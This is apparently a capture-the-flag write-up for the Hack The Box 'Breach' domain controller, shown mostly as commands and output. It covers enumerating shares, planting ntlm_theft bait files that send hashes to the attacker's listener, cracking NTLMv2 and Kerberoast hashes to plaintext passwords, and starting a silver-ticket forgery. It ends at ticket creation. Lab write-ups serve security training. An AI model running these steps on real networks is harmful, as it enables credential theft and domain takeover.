HTB | Breach

Machine - https://app.hackthebox.com/machines/Breach

IP - 10.129.61.210

Machine Information - The User flag for this Box is located in a non-standard directory, C:\share\transfer\.

NMAP

 nmap -sC -sV -p 53,80,88,135,139,445,464,593,636,3268,3269,3389,5985,9389,49664,49668,49677,4992 10.129.61.210 -Pn -oA nmap_port_details
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-10-15 03:43 UTC
Nmap scan report for ip-10-129-61-210.ap-south-1.compute.internal (10.129.61.210)
Host is up (0.12s latency).

PORT      STATE    SERVICE       VERSION
53/tcp    open     domain        Simple DNS Plus
80/tcp    open     http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp    open     kerberos-sec  Microsoft Windows Kerberos (server time: 2025-10-15 03:43:48Z)
135/tcp   open     msrpc         Microsoft Windows RPC
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds?
464/tcp   open     kpasswd5?
593/tcp   open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open     tcpwrapped
3268/tcp  open     ldap          Microsoft Windows Active Directory LDAP (Domain: breach.vl0., Site: Default-First-Site-Name)
3269/tcp  open     tcpwrapped
3389/tcp  open     ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=BREACHDC.breach.vl
| Not valid before: 2025-09-07T08:04:48
|_Not valid after:  2026-03-09T08:04:48
|_ssl-date: 2025-10-15T03:45:18+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: BREACH
|   NetBIOS_Domain_Name: BREACH
|   NetBIOS_Computer_Name: BREACHDC
|   DNS_Domain_Name: breach.vl
|   DNS_Computer_Name: BREACHDC.breach.vl
|   DNS_Tree_Name: breach.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-10-15T03:44:39+00:00
4992/tcp  filtered unknown
5985/tcp  open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
|_http-title: Not Found
9389/tcp  open     mc-nmf        .NET Message Framing
49664/tcp open     msrpc         Microsoft Windows RPC
49668/tcp open     msrpc         Microsoft Windows RPC
49677/tcp open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
Service Info: Host: BREACHDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-10-15T03:44:40
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 100.80 seconds

Port 80

This is a basic IIS webpage

 curl <http://10.129.61.210/>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "<http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd>">
<html xmlns="<http://www.w3.org/1999/xhtml>">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>IIS Windows Server</title>
<style type="text/css">
<!--
body {
        color:#000000;
        background-color:#0072C6;
        margin:0;
}

#container {
        margin-left:auto;
        margin-right:auto;
        text-align:center;
        }

a img {
        border:none;
}

-->
</style>
</head>
<body>
<div id="container">
<a href="<http://go.microsoft.com/fwlink/?linkid=66138&amp;clcid=0x409>"><img src="iisstart.png" alt="IIS" width="960" height="600" /></a>
</div>
</body>

SMB

We can do null auth but do not have access to enum shares or rid brute force

netexec smb 10.129.61.210 -u "" -p "" --shares
SMB         10.129.61.210   445    BREACHDC         [*] Windows Server 2022 Build 20348 x64 (name:BREACHDC) (domain:breach.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.61.210   445    BREACHDC         [+] breach.vl\\: 
SMB         10.129.61.210   445    BREACHDC         [-] Error enumerating shares: STATUS_ACCESS_DENIED

 netexec smb 10.129.61.210 -u "" -p "" --rid-brute
SMB         10.129.61.210   445    BREACHDC         [*] Windows Server 2022 Build 20348 x64 (name:BREACHDC) (domain:breach.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.61.210   445    BREACHDC         [+] breach.vl\\: 
SMB         10.129.61.210   445    BREACHDC         [-] Error connecting: LSAD SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.

Let’s check for guest Login and we can not only authenticate but we can enum shares

 netexec smb 10.129.61.210 -u "guest" -p "" --shares
SMB         10.129.61.210   445    BREACHDC         [*] Windows Server 2022 Build 20348 x64 (name:BREACHDC) (domain:breach.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.61.210   445    BREACHDC         [+] breach.vl\\guest: 
SMB         10.129.61.210   445    BREACHDC         [*] Enumerated shares
SMB         10.129.61.210   445    BREACHDC         Share           Permissions     Remark
SMB         10.129.61.210   445    BREACHDC         -----           -----------     ------
SMB         10.129.61.210   445    BREACHDC         ADMIN$                          Remote Admin
SMB         10.129.61.210   445    BREACHDC         C$                              Default share
SMB         10.129.61.210   445    BREACHDC         IPC$            READ            Remote IPC
SMB         10.129.61.210   445    BREACHDC         NETLOGON                        Logon server share 
SMB         10.129.61.210   445    BREACHDC         share           READ,WRITE      
SMB         10.129.61.210   445    BREACHDC         SYSVOL                          Logon server share 
SMB         10.129.61.210   445    BREACHDC         Users           READ   

and also rid-brute

netexec smb 10.129.61.210 -u "guest" -p "" --rid-brute
SMB         10.129.61.210   445    BREACHDC         [*] Windows Server 2022 Build 20348 x64 (name:BREACHDC) (domain:breach.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.61.210   445    BREACHDC         [+] breach.vl\\guest: 
SMB         10.129.61.210   445    BREACHDC         498: BREACH\\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.61.210   445    BREACHDC         500: BREACH\\Administrator (SidTypeUser)
SMB         10.129.61.210   445    BREACHDC         501: BREACH\\Guest (SidTypeUser)
SMB         10.129.61.210   445    BREACHDC         502: BREACH\\krbtgt (SidTypeUser)
SMB         10.129.61.210   445    BREACHDC         512: BREACH\\Domain Admins (SidTypeGroup)
SMB         10.129.61.210   445    BREACHDC         513: BREACH\\Domain Users (SidTypeGroup)
SMB         10.129.61.210   445    BREACHDC         514: BREACH\\Domain Guests (SidTypeGroup)
SMB         10.129.61.210   445    BREACHDC         515: BREACH\\Domain Computers (SidTypeGroup)
SMB         10.129.61.210   445    BREACHDC         516: BREACH\\Domain Controllers (SidTypeGroup)
SMB         10.129.61.210   445    BREACHDC         517: BREACH\\Cert Publishers (SidTypeAlias)
SMB         10.129.61.210   445    BREACHDC         518: BREACH\\Schema Admins (SidTypeGroup)
SMB         10.129.61.210   445    BREACHDC         519: BREACH\\Enterprise Admins (SidTypeGroup)
SMB         10.129.61.210   445    BREACHDC         520: BREACH\\Group Policy Creator Owners (SidTypeGroup)
SMB         10.129.61.210   445    BREACHDC         521: BREACH\\Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.61.210   445    BREACHDC         522: BREACH\\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.129.61.210   445    BREACHDC         525: BREACH\\Protected Users (SidTypeGroup)
SMB         10.129.61.210   445    BREACHDC         526: BREACH\\Key Admins (SidTypeGroup)
SMB         10.129.61.210   445    BREACHDC         527: BREACH\\Enterprise Key Admins (SidTypeGroup)
SMB         10.129.61.210   445    BREACHDC         553: BREACH\\RAS and IAS Servers (SidTypeAlias)
SMB         10.129.61.210   445    BREACHDC         571: BREACH\\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.129.61.210   445    BREACHDC         572: BREACH\\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.129.61.210   445    BREACHDC         1000: BREACH\\BREACHDC$ (SidTypeUser)
SMB         10.129.61.210   445    BREACHDC         1101: BREACH\\DnsAdmins (SidTypeAlias)
SMB         10.129.61.210   445    BREACHDC         1102: BREACH\\DnsUpdateProxy (SidTypeGroup)
SMB         10.129.61.210   445    BREACHDC         1103: BREACH\\SQLServer2005SQLBrowserUser$BREACHDC (SidTypeAlias)
SMB         10.129.61.210   445    BREACHDC         1104: BREACH\\staff (SidTypeGroup)
SMB         10.129.61.210   445    BREACHDC         1105: BREACH\\Claire.Pope (SidTypeUser)
SMB         10.129.61.210   445    BREACHDC         1106: BREACH\\Julia.Wong (SidTypeUser)
SMB         10.129.61.210   445    BREACHDC         1107: BREACH\\Hilary.Reed (SidTypeUser)
SMB         10.129.61.210   445    BREACHDC         1108: BREACH\\Diana.Pope (SidTypeUser)
SMB         10.129.61.210   445    BREACHDC         1109: BREACH\\Jasmine.Price (SidTypeUser)
SMB         10.129.61.210   445    BREACHDC         1110: BREACH\\George.Williams (SidTypeUser)
SMB         10.129.61.210   445    BREACHDC         1111: BREACH\\Lawrence.Kaur (SidTypeUser)
SMB         10.129.61.210   445    BREACHDC         1112: BREACH\\Jasmine.Slater (SidTypeUser)
SMB         10.129.61.210   445    BREACHDC         1113: BREACH\\Hugh.Watts (SidTypeUser)
SMB         10.129.61.210   445    BREACHDC         1114: BREACH\\Christine.Bruce (SidTypeUser)
SMB         10.129.61.210   445    BREACHDC         1115: BREACH\\svc_mssql (SidTypeUser)

Let’s copy the name, and use smbclient to look for files in the share share

smbclient -U guest //10.129.61.210/share
Password for [WORKGROUP\\guest]:
Try "help" to get a list of possible commands.
smb: \\> ls
  .                                   D        0  Wed Oct 15 04:27:12 2025
  ..                                DHS        0  Tue Sep  9 10:35:32 2025
  finance                             D        0  Thu Feb 17 11:19:34 2022
  software                            D        0  Thu Feb 17 11:19:12 2022
  transfer                            D        0  Mon Sep  8 10:13:44 2025

                7863807 blocks of size 4096. 1518359 blocks available
smb: \\> 

We can see three folders in this share, but finance and software are both empty. Transfer, on the other hand, has some directories,

smb: \\> ls transfer\\
  .                                   D        0  Mon Sep  8 10:13:44 2025
  ..                                  D        0  Wed Oct 15 04:27:12 2025
  claire.pope                         D        0  Thu Feb 17 11:21:35 2022
  diana.pope                          D        0  Thu Feb 17 11:21:19 2022
  julia.wong                          D        0  Thu Apr 17 00:38:12 2025

We can’t list the contents of these directories, but we can make an educated assumption that these users might be connecting to this share and browsing it on a regular basis.

smb: \\> ls transfer\\claire.pope\\
NT_STATUS_ACCESS_DENIED listing \\transfer\\claire.pope\\
smb: \\> ls transfer\\diana.pope\\
NT_STATUS_ACCESS_DENIED listing \\transfer\\diana.pope\\
smb: \\> ls transfer\\julia.wong\\
NT_STATUS_ACCESS_DENIED listing \\transfer\\julia.wong\\

Foothold/shell

Shell as juila.wong

NTLM theft

Let’s upload the files generated via https://github.com/Greenwolf/ntlm_theft

 python3 ntlm_theft/ntlm_theft.py  --server 10.10.14.18 --generate all --filename important
/home/admin/breach/ntlm_theft/ntlm_theft.py:168: SyntaxWarning: invalid escape sequence '\\l'
  location.href = 'ms-word:ofe|u|\\\\''' + server + '''\\leak\\leak.docx';
Created: important/important.scf (BROWSE TO FOLDER)
Created: important/important-(url).url (BROWSE TO FOLDER)
Created: important/important-(icon).url (BROWSE TO FOLDER)
Created: important/important.lnk (BROWSE TO FOLDER)
Created: important/important.rtf (OPEN)
Created: important/important-(stylesheet).xml (OPEN)
Created: important/important-(fulldocx).xml (OPEN)
Created: important/important.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: important/important-(handler).htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: important/important-(handler).htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: important/important-(includepicture).docx (OPEN)
Created: important/important-(remotetemplate).docx (OPEN)
Created: important/important-(frameset).docx (OPEN)
Created: important/important-(externalcell).xlsx (OPEN)
Created: important/important.wax (OPEN)
Created: important/important.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
Created: important/important.asx (OPEN)
Created: important/important.jnlp (OPEN)
Created: important/important.application (DOWNLOAD AND OPEN)
Created: important/important.pdf (OPEN AND ALLOW)
Created: important/zoom-attack-instructions.txt (PASTE TO CHAT)
Created: important/important.library-ms (BROWSE TO FOLDER)
Created: important/Autorun.inf (BROWSE TO FOLDER)
Created: important/desktop.ini (BROWSE TO FOLDER)
Created: important/important.theme (THEME TO INSTALL
Generation Complete.

now let’s upload the files and wait for the call back on our listner

#upload
smb: \\> cd transfer\\
smb: \\transfer\\> recurse ON
smb: \\transfer\\> prompt OFF
smb: \\transfer\\> mput *
putting file important.application as \\transfer\\important.application (4.4 kb/s) (average 4.4 kb/s)
putting file important-(externalcell).xlsx as \\transfer\\important-(externalcell).xlsx (15.7 kb/s) (average 10.1 kb/s)
putting file important-(fulldocx).xml as \\transfer\\important-(fulldocx).xml (102.0 kb/s) (average 54.9 kb/s)
putting file important.theme as \\transfer\\important.theme (3.7 kb/s) (average 43.0 kb/s)
putting file important-(url).url as \\transfer\\important-(url).url (0.1 kb/s) (average 34.6 kb/s)
putting file important-(icon).url as \\transfer\\important-(icon).url (0.2 kb/s) (average 28.1 kb/s)
putting file important-(stylesheet).xml as \\transfer\\important-(stylesheet).xml (0.3 kb/s) (average 23.8 kb/s)
putting file important.m3u as \\transfer\\important.m3u (0.1 kb/s) (average 21.3 kb/s)
putting file important.lnk as \\transfer\\important.lnk (4.6 kb/s) (average 19.5 kb/s)
putting file important-(handler).htm as \\transfer\\important-(handler).htm (0.3 kb/s) (average 17.8 kb/s)
putting file important.rtf as \\transfer\\important.rtf (0.1 kb/s) (average 13.7 kb/s)
putting file zoom-attack-instructions.txt as \\transfer\\zoom-attack-instructions.txt (0.3 kb/s) (average 12.9 kb/s)
putting file important.jnlp as \\transfer\\important.jnlp (0.5 kb/s) (average 12.1 kb/s)
putting file important.library-ms as \\transfer\\important.library-ms (3.2 kb/s) (average 11.7 kb/s)
putting file important.pdf as \\transfer\\important.pdf (1.8 kb/s) (average 11.1 kb/s)
putting file important.htm as \\transfer\\important.htm (0.2 kb/s) (average 10.6 kb/s)
putting file important.scf as \\transfer\\important.scf (0.2 kb/s) (average 10.2 kb/s)
putting file important-(includepicture).docx as \\transfer\\important-(includepicture).docx (27.5 kb/s) (average 10.9 kb/s)
putting file important-(remotetemplate).docx as \\transfer\\important-(remotetemplate).docx (70.5 kb/s) (average 13.3 kb/s)
putting file desktop.ini as \\transfer\\desktop.ini (0.1 kb/s) (average 12.7 kb/s)
putting file Autorun.inf as \\transfer\\Autorun.inf (0.2 kb/s) (average 12.3 kb/s)
putting file important-(frameset).docx as \\transfer\\important-(frameset).docx (26.8 kb/s) (average 12.8 kb/s)
putting file important.wax as \\transfer\\important.wax (0.2 kb/s) (average 12.4 kb/s)
putting file important.asx as \\transfer\\important.asx (0.4 kb/s) (average 12.0 kb/s)

#on responder
[SMB] NTLMv2-SSP Client   : 10.129.193.217
[SMB] NTLMv2-SSP Username : BREACH\\Julia.Wong
[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:732a70946b9eb1c7:2AC462323F73DB38CAE919A53ABBBD45:0101000000000000804431E9B43DDC01280BA44F7AFFC8B00000000002000800590033003200560001001E00570049004E002D0055004F0048004200460055003000370046004F00560004003400570049004E002D0055004F0048004200460055003000370046004F0056002E0059003300320056002E004C004F00430041004C000300140059003300320056002E004C004F00430041004C000500140059003300320056002E004C004F00430041004C0007000800804431E9B43DDC0106000400020000000800300030000000000000000100000000200000B204D424D7F4335A8BB4EFBEA44D5ACECEEB449E540DC2ADE3564B548F0CB0110A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00310038000000000000000000

Let’s try to crack hash and we got the password

hashcat Julia.hash /opt/rockyou.txt 
<--SNIP-->
JULIA.WONG::BREACH:732a70946b9eb1c7:2ac462323f73db38cae919a53abbbd45:0101000000000000804431e9b43ddc01280ba44f7affc8b00000000002000800590033003200560001001e00570049004e002d0055004f0048004200460055003000370046004f00560004003400570049004e002d0055004f0048004200460055003000370046004f0056002e0059003300320056002e004c004f00430041004c000300140059003300320056002e004c004f00430041004c000500140059003300320056002e004c004f00430041004c0007000800804431e9b43ddc0106000400020000000800300030000000000000000100000000200000b204d424d7f4335a8bb4efbea44d5aceceeb449e540dc2ade3564b548f0cb0110a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00310038000000000000000000:Computer1
<--SNIP-->

Now we can login as juila.wong on smb and got the user.txt

smbclient -U "julia.wong" //10.129.193.217/share/
Password for [WORKGROUP\\julia.wong]:
Try "help" to get a list of possible commands.
smb: \\> cd transfer\\julia.wong\\
smb: \\transfer\\julia.wong\\> ls
  .                                   D        0  Thu Apr 17 00:38:12 2025
  ..                                  D        0  Wed Oct 15 09:12:21 2025
  user.txt                            A       32  Thu Apr 17 00:38:22 2025

                7863807 blocks of size 4096. 1527110 blocks available

Priveleage Esclation

Shell as ?

Kerberoasting

Since we have the valid credential we can perform the Kerberoasting

netexec ldap 10.129.193.217 -u "JULIA.WONG" -p "Computer1" --kerberoasting output.txt
LDAP        10.129.193.217  389    BREACHDC         [*] Windows Server 2022 Build 20348 (name:BREACHDC) (domain:breach.vl) (signing:None) (channel binding:No TLS cert) 
LDAP        10.129.193.217  389    BREACHDC         [+] breach.vl\\JULIA.WONG:Computer1 
LDAP        10.129.193.217  389    BREACHDC         [*] Skipping disabled account: krbtgt
LDAP        10.129.193.217  389    BREACHDC         [*] Total of records returned 1
LDAP        10.129.193.217  389    BREACHDC         [*] sAMAccountName: svc_mssql, memberOf: [], pwdLastSet: 2022-02-17 10:43:08.106169, lastLogon: 2025-10-15 08:49:59.732920
LDAP        10.129.193.217  389    BREACHDC         $krb5tgs$23$*svc_mssql$BREACH.VL$breach.vl\\svc_mssql*$4cc2c89e635008ed270cb0da3d8d515c$c4947cd8237a6e22cbaaa420e0369af3be06cabb5b71f4c46a7f385bc9a98704fb547b94d882c5fa0a96e14174bfbd374c9b12a3d8965f6fe44bc539a1bac1aae9b1a70a2c941378b209cabedec4c9bbbe8914fe1eebeb135a403a599ca0ac9b5f17e6b77fe118d8f7f71f84152f7e54f16a0a36c70ce3224953b3ab9f4e4c68a68001480994572e3ea3c76d0967689457fdd7934e7b17bcdee867f6dd66135547f4ba0a5e6acacdf79888e8de0cd80effc873c3518bcc7fad37d8df9191c8927dc3648bc9df9936f7c4d98488a03e19936bacc56a70445b10d341902b25322dc534ea4bb9a587e282ee1df249c57e1b715a66840033f9d78789323fdb8c42166b89e6cea58ac194442e3a76f77dbcb0ef7b2e94d8797167d0c9dbc8bcf4e961ae4154697101c13ccafa2170e3ce9f3afed3b69a1057d3c3c37c72baf312d0ca6e4fb8e7e342374029d265beb88931cafd4a1468377b47fcd133b1c4817d6e5f0f784ef6764b0f0beaa6cd767c79cc990d741e09c47e7b1b151a456d56287c1066c2edebaf9b9d16a627b13fd63ee939c9475888071c12a77100996a02dfee9da01fe6f4792be324e46ec54035b1dc86f43cdf0980ee2ec486f36abea137c17756250fc496ffc49afd9c06a380d4d8aa38fb0e94eb40c3621296a3447ae3c091257d3ecc4bf5bb4b947b5e089d91029565c492dae6db237c7f2712fd6a34936b1dbd8dd7d08883c44fa1db28cfd169254686b96c355957b12e5ee27f9546f35d0d66282d7fa4ec2177b78059fa70196b8ad8e60a268389f60aa40d24df565102fe8bff433d1d2111c4304421704a69e92a2e8bb3f866c3f01038e1e14b69a35be7c5a039dd59d3be9e2f761c3e50fe18191746e609cad34da668e59683f9fe1326fa765254e75913735f679ee8a9ab9ff258c744ca2add49aa2dd508405b80406f2b98ebfce49e28a341af964d9dfc489d21b47336048df0437230906ad241730b84a3dab5689826f8a26be228db2bc058ae69d72d497fb23e40e39f4998f4662bdf0368cded541194a58872eec45d24d525d74c34c7634c5d2d2160b5da5d4307a1fa392f2a06f34fa22d3ef5f89e956b848ec92c65fec299754607b842c33ac4f4caa710ed7b7e33795f67774844674b56181ff57a7c5d8a99b2f9bd625ca4a8bddd628174916608b2255027340aae4e778f2ca15c4060ed04d976720c33179b9d63a7620fc2689d5920a0b856a273b54600f7b56077bead35a1d92485ff402690076f23eaf875cc0c530fdd84b45735e78213ecf7d4c6e84bd65925999f56fcd977b9c5188ffa5aa809c557d801f28c94f4b539f07d3a99921a507b4d603f0b4fdb32e92b69b72fbbcb1b26dcd5888ec04f17226e0209dc0bfa0c81b14b0b72c17992e789c6d17a31a78e85d6aeaf14523d427fc8a429d78db1becaea84699cafc31edf72cbe4960e6e73950bf4e21942c432

and we have the hash for svc_mssql

Let’s try to crack the hash and got the password

 hashcat output.txt /opt/rockyou.txt 
 <--SNIP-->
 $krb5tgs$23$*svc_mssql$BREACH.VL$breach.vl\\svc_mssql*$4cc2c89e635008ed270cb0da3d8d515c$c4947cd8237a6e22cbaaa420e0369af3be06cabb5b71f4c46a7f385bc9a98704fb547b94d882c5fa0a96e14174bfbd374c9b12a3d8965f6fe44bc539a1bac1aae9b1a70a2c941378b209cabedec4c9bbbe8914fe1eebeb135a403a599ca0ac9b5f17e6b77fe118d8f7f71f84152f7e54f16a0a36c70ce3224953b3ab9f4e4c68a68001480994572e3ea3c76d0967689457fdd7934e7b17bcdee867f6dd66135547f4ba0a5e6acacdf79888e8de0cd80effc873c3518bcc7fad37d8df9191c8927dc3648bc9df9936f7c4d98488a03e19936bacc56a70445b10d341902b25322dc534ea4bb9a587e282ee1df249c57e1b715a66840033f9d78789323fdb8c42166b89e6cea58ac194442e3a76f77dbcb0ef7b2e94d8797167d0c9dbc8bcf4e961ae4154697101c13ccafa2170e3ce9f3afed3b69a1057d3c3c37c72baf312d0ca6e4fb8e7e342374029d265beb88931cafd4a1468377b47fcd133b1c4817d6e5f0f784ef6764b0f0beaa6cd767c79cc990d741e09c47e7b1b151a456d56287c1066c2edebaf9b9d16a627b13fd63ee939c9475888071c12a77100996a02dfee9da01fe6f4792be324e46ec54035b1dc86f43cdf0980ee2ec486f36abea137c17756250fc496ffc49afd9c06a380d4d8aa38fb0e94eb40c3621296a3447ae3c091257d3ecc4bf5bb4b947b5e089d91029565c492dae6db237c7f2712fd6a34936b1dbd8dd7d08883c44fa1db28cfd169254686b96c355957b12e5ee27f9546f35d0d66282d7fa4ec2177b78059fa70196b8ad8e60a268389f60aa40d24df565102fe8bff433d1d2111c4304421704a69e92a2e8bb3f866c3f01038e1e14b69a35be7c5a039dd59d3be9e2f761c3e50fe18191746e609cad34da668e59683f9fe1326fa765254e75913735f679ee8a9ab9ff258c744ca2add49aa2dd508405b80406f2b98ebfce49e28a341af964d9dfc489d21b47336048df0437230906ad241730b84a3dab5689826f8a26be228db2bc058ae69d72d497fb23e40e39f4998f4662bdf0368cded541194a58872eec45d24d525d74c34c7634c5d2d2160b5da5d4307a1fa392f2a06f34fa22d3ef5f89e956b848ec92c65fec299754607b842c33ac4f4caa710ed7b7e33795f67774844674b56181ff57a7c5d8a99b2f9bd625ca4a8bddd628174916608b2255027340aae4e778f2ca15c4060ed04d976720c33179b9d63a7620fc2689d5920a0b856a273b54600f7b56077bead35a1d92485ff402690076f23eaf875cc0c530fdd84b45735e78213ecf7d4c6e84bd65925999f56fcd977b9c5188ffa5aa809c557d801f28c94f4b539f07d3a99921a507b4d603f0b4fdb32e92b69b72fbbcb1b26dcd5888ec04f17226e0209dc0bfa0c81b14b0b72c17992e789c6d17a31a78e85d6aeaf14523d427fc8a429d78db1becaea84699cafc31edf72cbe4960e6e73950bf4e21942c432:Trustno1
 <--SNIP-->

Strangely on my initial scan iI did’t see the mssql open but it open now

nmap -sCV -p1433 breach.vl
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-10-15 10:26 UTC
Nmap scan report for breach.vl (10.129.193.217)
Host is up (0.12s latency).

PORT     STATE SERVICE  VERSION
1433/tcp open  ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-10-15T08:50:11
|_Not valid after:  2055-10-15T08:50:11
|_ssl-date: 2025-10-15T10:27:07+00:00; 0s from scanner time.

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 14.88 seconds

for proto in {ldap,smb,mssql,winrm}; do nxc $proto breach.vl -d breach.vl -u 'svc_mssql' -p  'Trustno1'; echo; done
LDAP        10.129.193.217  389    BREACHDC         [*] Windows Server 2022 Build 20348 (name:BREACHDC) (domain:breach.vl) (signing:None) (channel binding:No TLS cert) 
LDAP        10.129.193.217  389    BREACHDC         [+] breach.vl\\svc_mssql:Trustno1 

SMB         10.129.193.217  445    BREACHDC         [*] Windows Server 2022 Build 20348 x64 (name:BREACHDC) (domain:breach.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.193.217  445    BREACHDC         [+] breach.vl\\svc_mssql:Trustno1 

MSSQL       10.129.193.217  1433   BREACHDC         [*] Windows Server 2022 Build 20348 (name:BREACHDC) (domain:breach.vl)
MSSQL       10.129.193.217  1433   BREACHDC         [+] breach.vl\\svc_mssql:Trustno1 

WINRM       10.129.193.217  5985   BREACHDC         [*] Windows Server 2022 Build 20348 (name:BREACHDC) (domain:breach.vl) 
WINRM       10.129.193.217  5985   BREACHDC         [-] breach.vl\\svc_mssql:Trustno1

Let’s login via svc_mssql

mssqlclient.py svc_mssql@breach.vl -windows-auth
Impacket v0.13.0.dev0+20251006.23741.2d6c563c - Copyright Fortra, LLC and its affiliated companies 

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(BREACHDC\\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(BREACHDC\\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2019 RTM (15.0.2000)
[!] Press help for extra shell commands
SQL (BREACH\\svc_mssql  guest@master)> 

we can use xp_dirtree

xp_dirtree C:\\
subdirectory                depth   file   
-------------------------   -----   ----   
$Recycle.Bin                    1      0   
$WinREAgent                     1      0   
Boot                            1      0   
Documents and Settings          1      0   
EFI                             1      0   
inetpub                         1      0   
PerfLogs                        1      0   
Program Files                   1      0   
Program Files (x86)             1      0   
ProgramData                     1      0   
Recovery                        1      0   
share                           1      0   
System Volume Information       1      0   
Users                           1      0   
Windows                         1      0 

Sliver Attack

we have the credentials for the user that this service is running as, a new vector of attack opens up for us — a silver ticket attack.

How does this work?

When a TGS is presented to the MSSQL service, as long as it is encrypted with the NT hash of the svc_mssql user, it is trusted. Since we have the password for the user, we can easily calculate the NT hash, and forge a ticket, which will allow us to impersonate any user, even a domain admin, in the context of this service.

Domain admins should have admin privileges over the MSSQL database, so that should get us one step closer to owning this DC.

To perform this, we need the domain SID

lookupsid.py -domain-sid 'breach.vl'/'svc_mssql':'Trustno1'@10.129.193.217
Impacket v0.13.0.dev0+20251006.23741.2d6c563c - Copyright Fortra, LLC and its affiliated companies 

[*] Brute forcing SIDs at 10.129.193.217
[*] StringBinding ncacn_np:10.129.193.217[\\pipe\\lsarpc]
[*] Domain SID is: S-1-5-21-2330692793-3312915120-706255856
498: BREACH\\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: BREACH\\Administrator (SidTypeUser)
501: BREACH\\Guest (SidTypeUser)
502: BREACH\\krbtgt (SidTypeUser)
512: BREACH\\Domain Admins (SidTypeGroup)
513: BREACH\\Domain Users (SidTypeGroup)
514: BREACH\\Domain Guests (SidTypeGroup)
515: BREACH\\Domain Computers (SidTypeGroup)
516: BREACH\\Domain Controllers (SidTypeGroup)
517: BREACH\\Cert Publishers (SidTypeAlias)
518: BREACH\\Schema Admins (SidTypeGroup)
519: BREACH\\Enterprise Admins (SidTypeGroup)
520: BREACH\\Group Policy Creator Owners (SidTypeGroup)
521: BREACH\\Read-only Domain Controllers (SidTypeGroup)
522: BREACH\\Cloneable Domain Controllers (SidTypeGroup)
525: BREACH\\Protected Users (SidTypeGroup)
526: BREACH\\Key Admins (SidTypeGroup)
527: BREACH\\Enterprise Key Admins (SidTypeGroup)
553: BREACH\\RAS and IAS Servers (SidTypeAlias)
571: BREACH\\Allowed RODC Password Replication Group (SidTypeAlias)
572: BREACH\\Denied RODC Password Replication Group (SidTypeAlias)
1000: BREACH\\BREACHDC$ (SidTypeUser)
1101: BREACH\\DnsAdmins (SidTypeAlias)
1102: BREACH\\DnsUpdateProxy (SidTypeGroup)
1103: BREACH\\SQLServer2005SQLBrowserUser$BREACHDC (SidTypeAlias)
1104: BREACH\\staff (SidTypeGroup)
1105: BREACH\\Claire.Pope (SidTypeUser)
1106: BREACH\\Julia.Wong (SidTypeUser)
1107: BREACH\\Hilary.Reed (SidTypeUser)
1108: BREACH\\Diana.Pope (SidTypeUser)
1109: BREACH\\Jasmine.Price (SidTypeUser)
1110: BREACH\\George.Williams (SidTypeUser)
1111: BREACH\\Lawrence.Kaur (SidTypeUser)
1112: BREACH\\Jasmine.Slater (SidTypeUser)
1113: BREACH\\Hugh.Watts (SidTypeUser)
1114: BREACH\\Christine.Bruce (SidTypeUser)
1115: BREACH\\svc_mssql (SidTypeUser)

Now we need NTLM of svc account for that i used this online tool can generate a ticket ( I try to generate tickets for all the user but Christine.Bruc authenticates)

└─$ impacket-ticketer -nthash 69596C7AA1E8DAEE17F8E78870E25A5C -domain breach.vl -domain-sid S-1-5-21-2330692793-3312915120-706255856 -spn MSSQLSvc/BREACHDC.breach.vl Christine.Bruce
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Creating basic skeleton ticket and PAC Infos
